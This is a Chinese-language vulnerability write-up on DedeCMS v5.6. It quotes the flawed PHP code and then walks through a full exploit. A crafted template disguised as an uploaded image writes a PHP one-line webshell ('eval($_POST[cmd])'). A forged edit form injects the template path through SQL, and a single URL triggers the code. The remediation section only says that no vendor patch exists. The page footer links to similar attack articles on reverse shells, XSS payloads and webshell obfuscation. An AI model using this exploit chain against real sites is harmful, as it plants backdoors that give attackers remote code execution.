DEDECMS网站管理系统模板执行漏洞(影响版本v5.6)

所属分类: 网络安全 / 脚本攻防 阅读数: 1342
收藏 0 赞 0 分享
影响版本:
DEDECMS v5.6 Final

程序介绍:
DedeCms 基于PHP+MySQL的技术开发,支持Windows、Linux、Unix等多种服务器平台,从2004年开始发布第一个版本开始,至今已经发布了五个大版本。DedeCms以简单、健壮、灵活、开源几大特点占领了国内CMS的大部份市场,目前已经有超过二十万个站点正在使用DedeCms或居于DedeCms核心,是目前国内应用最广泛的php类CMS系统。

漏洞分析:

Dedecms V5.6 Final版本中的各个文件存在一系列问题,经过精心构造的含有恶意代表的模板内容可以通过用户后台的上传附件的功能上传上去,然后通过SQL注入修改附加表的模板路径为我们上传的模板路径,模板解析类:include/inc_archives_view.php没有对模板路径及名称做任何限制,则可以成功执行恶意代码。

1、member/article_edit.php文件(注入):
//漏洞在member文件夹下普遍存在,$dede_addonfields是由用户提交的,可以被伪造,伪造成功即可带入sql语句,于是我们可以给附加表的内容进行update赋值。
PHP Code复制内容到剪贴板
  1. …      
  2. //分析处理附加表数据      
  3.     $inadd_f = '';      
  4.     if(!emptyempty($dede_addonfields))//自己构造$dede_addonfields      
  5.     {      
  6.         $addonfields = explode(';',$dede_addonfields);      
  7.         if(is_array($addonfields))      
  8.         {      
  9.             print_r($addonfields);      
  10.             foreach($addonfields as $v)      
  11.             {      
  12.                 if($v=='')      
  13.                 {      
  14.                     continue;      
  15.                 }      
  16.                 $vs = explode(',',$v);      
  17.                 if(!isset(${$vs[0]}))      
  18.                 {      
  19.                     ${$vs[0]} = '';      
  20.                 }      
  21.                 ${$vs[0]} = GetFieldValueA(${$vs[0]},$vs[1],$aid);      
  22.                 $inadd_f .= ','.$vs[0]." ='".${$vs[0]}."' ";      
  23.                 echo $inadd_f;      
  24.             }      
  25.         }      
  26.     }      
  27. …      
  28. if($addtable!='')      
  29.     {      
  30.         $upQuery = "Update `$addtable` set typeid='$typeid',body='$body'{$inadd_f},userip='$userip' where aid='$aid' ";//执行构造的sql      
  31.         if(!$dsql->ExecuteNoneQuery($upQuery))      
  32.         {      
  33.             ShowMsg("更新附加表 `$addtable`  时出错,请联系管理员!","javascript:;");      
  34.             exit();      
  35.         }      
  36.     }      
  37. …   
2、include/inc_archives_view.php:
//这是模板处理类,如果附加表的模板路径存在,直接从附加表取值;GetTempletFile获取模板文件的方法就是取的此处的模板路径,从来带进去解析。
PHP Code复制内容到剪贴板
  1. …      
  2. //issystem==-1 表示单表模型,单表模型不支持redirecturl这类参数,因此限定内容普通模型才进行下面查询      
  3.             if($this->ChannelUnit->ChannelInfos['addtable']!='' && $this->ChannelUnit->ChannelInfos['issystem']!=-1)      
  4.             {      
  5.                 if(is_array($this->addTableRow))      
  6.                 {      
  7.                     $this->Fields['redirecturl'] = $this->addTableRow['redirecturl'];      
  8.                     $this->Fields['templet'] = $this->addTableRow['templet'];//取值      
  9.                     $this->Fields['userip'] = $this->addTableRow['userip'];      
  10.                 }      
  11.                 $this->Fields['templet'] = (emptyempty($this->Fields['templet']) ? '' : trim($this->Fields['templet']));      
  12.                 $this->Fields['redirecturl'] = (emptyempty($this->Fields['redirecturl']) ? '' : trim($this->Fields['redirecturl']));      
  13.                 $this->Fields['userip'] = (emptyempty($this->Fields['userip']) ? '' : trim($this->Fields['userip']));      
  14.             }      
  15.             else      
  16.             {      
  17.                 $this->Fields['templet'] = $this->Fields['redirecturl'] = '';      
  18.             }      
  19. …      
  20.       
  21.     //获得模板文件位置      
  22.     function GetTempletFile()      
  23.     {      
  24.         global $cfg_basedir,$cfg_templets_dir,$cfg_df_style;      
  25.         $cid = $this->ChannelUnit->ChannelInfos['nid'];      
  26.         if(!emptyempty($this->Fields['templet']))      
  27.         {      
  28.             $filetag = MfTemplet($this->Fields['templet']);      
  29.             if( !ereg('/'$filetag) ) $filetag = $GLOBALS['cfg_df_style'].'/'.$filetag;      
  30.         }      
  31.         else      
  32.         {      
  33.             $filetag = MfTemplet($this->TypeLink->TypeInfos["temparticle"]);      
  34.         }      
  35.         $tid = $this->Fields['typeid'];      
  36.         $filetag = str_replace('{cid}'$cid,$filetag);      
  37.         $filetag = str_replace('{tid}'$tid,$filetag);      
  38.         $tmpfile = $cfg_basedir.$cfg_templets_dir.'/'.$filetag;      
  39.         if($cid=='spec')      
  40.         {      
  41.             if( !emptyempty($this->Fields['templet']) )      
  42.             {      
  43.                 $tmpfile = $cfg_basedir.$cfg_templets_dir.'/'.$filetag;      
  44.             }      
  45.             else      
  46.             {      
  47.                 $tmpfile = $cfg_basedir.$cfg_templets_dir."/{$cfg_df_style}/article_spec.htm";      
  48.             }      
  49.         }      
  50.         if(!file_exists($tmpfile))      
  51.         {      
  52.             $tmpfile = $cfg_basedir.$cfg_templets_dir."/{$cfg_df_style}/".($cid=='spec' ? 'article_spec.htm' : 'article_default.htm');      
  53.         }      
  54.         return $tmpfile;      
  55.     }    
漏洞利用:

1.上传一个模板文件:

注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
uploads/userup/2/12OMX04-15A.jpg

模板内容是(如果限制图片格式,加gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}

2.修改刚刚发表的文章,查看源文件,构造一个表单:
XML/HTML Code复制内容到剪贴板
  1. <form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data" onsubmit="return checkSubmit();">      
  2. <input type="hidden" name="dopost" value="save" />      
  3. <input type="hidden" name="aid" value="2" />      
  4. <input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />      
  5. <input type="hidden" name="channelid" value="1" />      
  6. <input type="hidden" name="oldlitpic" value="" />      
  7. <input type="hidden" name="sortrank" value="1275972263" />      
  8. <div id="mainCp">      
  9. <h3 class="meTitle"><strong>修改文章</strong></h3>      
  10. <div class="postForm">      
  11. <label>标题:</label>      
  12. <input  name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>      
  13. <label>标签TAG:</label>      
  14. <input name="tags" type="text" id="tags"  value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)      
  15. <label>作者:</label>      
  16. <input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>      
  17. <label>隶属栏目:</label>      
  18. <select name='typeid' size='1'>      
  19. <option value='1' class='option3' selected=''>测试栏目</option>      
  20. </select>            <span style="color:#F00">*</span>(不能选择带颜色的分类)      
  21. <label>我的分类:</label>      
  22. <select name='mtypesid' size='1'>      
  23. <option value='0' selected>请选择分类...</option>      
  24. <option value='1' class='option3' selected>hahahha</option>      
  25. </select>      
  26. <label>信息摘要:</label>      
  27. <textarea name="description" id="description">1111111</textarea>      
  28. (内容的简要说明)      
  29. <label>缩略图:</label>      
  30. <input name="litpic" type="file" id="litpic" onchange="SeePicNew('divpicview',this);"  maxlength="100" class="intxt"/>      
  31. <input type='text' name='templet'      
  32. value="../ uploads/userup/2/12OMX04-15A.jpg">      
  33. <input type='text' name='dede_addonfields'      
  34. value="templet,htmltext;">(这里构造)      
  35. </div>      
  36. <!-- 表单操作区域 -->      
  37. <h3 class="meTitle">详细内容</h3>      
  38. <div class="contentShow postForm">      
  39. <input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>      
  40. <label>验证码:</label>      
  41. <input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />      
  42. <img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" onclick="this.src=this.src+'?'" />      
  43. <button class="button2" type="submit">提交</button>      
  44. <button class="button2 ml10" type="reset" onclick="location.reload();">重置</button>      
  45. </div>      
  46. </div>      
  47. </form>   
提交,提示修改成功,则我们已经成功修改模板路径。

3.访问修改的文章:

假设刚刚修改的文章的aid为2,则我们只需要访问:
http://127.0.0.1/dede/plus/view.php?aid=2
即可以在plus目录下生成小马:1.php

解决方案:
厂商补丁:
DEDECMS
------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.dedecms.com/

信息来源: oldjun's Blog
更多精彩内容其他人还在看

一句话木马后门在防注入中的重生

对于目前流行的sql注入,程序员在编写程序时,都普遍的加入防注入程序,有些防注入程序只要在我们提交一些非法的参数后,就会自动的记录下你的IP地址,提交的非法参数和动作等,同时也把非法提交的数据写入了系统的后缀为ASP的文件中,这也给了我们一些可利用的地方
收藏 0 赞 0 分享

ASP+PHP 标准sql注入语句(完整版)

这里为大家分享一下sql注入的一些语句,很多情况下由于程序员的安全意识薄弱或基本功不足就容易导致sql注入安全问题,建议大家多看一下网上的安全文章,最好的防范就是先学会攻击
收藏 0 赞 0 分享

SQL注入黑客防线网站实例分析

这篇文章主要介绍了SQL注入黑客防线网站实例分析,需要的朋友可以参考下
收藏 0 赞 0 分享

Linux 下多种编程语言的反弹 shell 方法

这篇文章主要介绍了Linux 下多种反弹 shell 方法,需要的朋友可以参考下
收藏 0 赞 0 分享

thinkphp代码执行getshell的漏洞解决

本文来介绍一下thinkphp官方修复的一个getshell漏洞,框架对控制器没有进行足够的检测导致的一处getshell,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
收藏 0 赞 0 分享

XSS攻击常识及常用脚本

XSS 攻击常用脚本,大家可以了解xss攻击的一些知识做好网站安全防范。
收藏 0 赞 0 分享

XSS攻击汇总 做网站安全的朋友需要注意下

貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的
收藏 0 赞 0 分享

PHP一句话Webshell变形总结

大部分Webshell查杀工具都是基于关键字特征的,通常他们会维护一个关键字列表,以此遍历指定扩展名的文件来进行扫描,所以可能最先想到的是各种字符串变形
收藏 0 赞 0 分享

phpddos流量攻击预防方法

先来理解一下什么是phpddos流量攻击,phpddos是一种黑客经过入侵WEB效劳器植入phpshell从而控制这个phpshell 向其他受害者或本人的效劳器发送UDP攻击包停止DDOS攻击
收藏 0 赞 0 分享

SQL注入攻防入门详解 [图文并茂] 附示例下载

毕业开始从事winfrm到今年转到 web ,在码农届已经足足混了快接近3年了,但是对安全方面的知识依旧薄弱,事实上是没机会接触相关开发……必须的各种借口。这几天把sql注入的相关知识整理了下,希望大家多多提意见
收藏 0 赞 0 分享
查看更多